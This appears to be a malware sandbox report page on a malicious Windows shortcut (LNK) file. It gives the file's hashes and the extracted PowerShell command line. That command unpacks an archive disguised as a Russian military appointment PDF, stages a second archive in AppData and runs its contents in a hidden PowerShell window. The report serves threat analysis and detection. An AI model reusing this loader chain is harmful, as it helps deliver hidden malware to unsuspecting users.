Malicious
Malicious

2731b3e8524e523a84dc7374ae29ac23

LNK File
|
MD5: 2731b3e8524e523a84dc7374ae29ac23
|
Size: 2.27 KB
|
application/x-ms-shortcut

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
2731b3e8524e523a84dc7374ae29ac23
Sha1
9a2a3126c6045edfe6d366939b201181da456f4a
Sha256
f44fa352c430d5f34462143daa726660be9d1bd0666ab2f3672df47adde55986
Sha384
623942467ddd4e636fa63ebc6b121e6e569e35c135a68ffc5efcdeac9290b41409f885115b7f3fae2f2f0461358fa8d8
Sha512
44bf6270c0c5be5d31b612d751e3d171e52825d5d59003ca938f9f46032d2135a20d13f1e606f3ccde8990182b14d68b8933f4bca9fefeb4e580db7de1a4c046
SSDeep
48:8wEfRSnkc+6Ym1tP0KZyKZuYZzNdWeHbd0dTdDabiMH:8wEfRDzOkspdBHO5dDz
TLSH
A741AC1567FA031CF2F74B396ABFA252997AFD05DA229B8D0105608C0870E20D971F7B
File Structure
2731b3e8524e523a84dc7374ae29ac23
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe $p=$env:USERPROFILE+'\Downloads\Исх №6626 Представление на назначение на воинскую должность.pdf.zip';Expand-Archive $p -DestinationPath $env:USERPROFILE\Downloads\incrementalStreamingMergingSocket; $p=$env:USERPROFILE+'\Downloads\incrementalStreamingMergingSocket\FOUND.000\processorContainerLogging.zip';Expand-Archive -Path $p -DestinationPath $env:APPDATA\reaper; $mergingAlgorithmEncrypting = gc $env:APPDATA\reaper\responsiveHashingSocketScalableDeterministic; Start-Process -WindowStyle Hidden powershell $mergingAlgorithmEncrypting
Deobfuscated PowerShell

$mergingAlgorithmEncrypting
2731b3e8524e523a84dc7374ae29ac23 (2.27 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙